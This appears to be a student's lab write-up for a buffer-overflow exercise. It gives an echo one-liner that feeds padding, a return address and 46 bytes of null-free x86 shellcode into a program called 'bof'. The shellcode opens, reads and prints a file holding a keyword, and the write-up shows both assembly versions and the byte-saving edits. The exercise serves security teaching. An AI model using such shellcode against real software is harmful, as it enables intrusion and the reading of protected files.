Tre' Smith Shell Code

echo -en "AAAAAAAAAAAAAAAABBBB\x26\x85\x04\x08\x31\xC0\x04\x05\xBB\x12\x9B\x04\x08\x31\xC9\x31\xD2\xCD\x80\x89\xD9\x89\xC3\x31\xC0\x04\x03\x80\xC2\x1E\xCD\x80\x31\xC0\x04\x04\x31\xDB\xFE\xC3\xCD\x80\x31\xC0\xFE\xC0\x31\xDB\xCD\x80" | bof

46 BYTES


This is the code I edited to get the keyword: CORRECT HORSE BATTERY STAPLE


Original Code:

; sys_open file
mov eax, 5
mov ebx, 0x08049b12
mov ecx, 0
mov edx, 0
int 0x80

; sys_read from file into memory
mov ebx, eax
mov eax, 3
mov ecx, 0x08049b12
mov edx, 30
int 0x80

; sys_write memory to terminal
mov eax, 4
mov ebx, 1
mov ecx, 0x08049b12
mov edx, 30
int 0x80

; sys_exit
mov eax, 1
mov ebx, 0
int 0x80


My Edited Code (Contains No NULL bytes and is 46 BYTES in size):

xor eax, eax
add al, 5
mov ebx, 0x08049b12
xor ecx, ecx
xor edx, edx
int 0x80
mov ecx, ebx
mov ebx, eax
xor eax, eax
add al, 3
add dl, 30
int 0x80
xor eax, eax
add al, 4
xor ebx, ebx
inc bl
int 0x80
xor eax, eax
inc al
xor ebx, ebx
int 0x80


To achieve this amount of bytes I changed most of the mov functions to xor and add functions as these are less bytes. I also removed some redundant mov functions that are used more than once.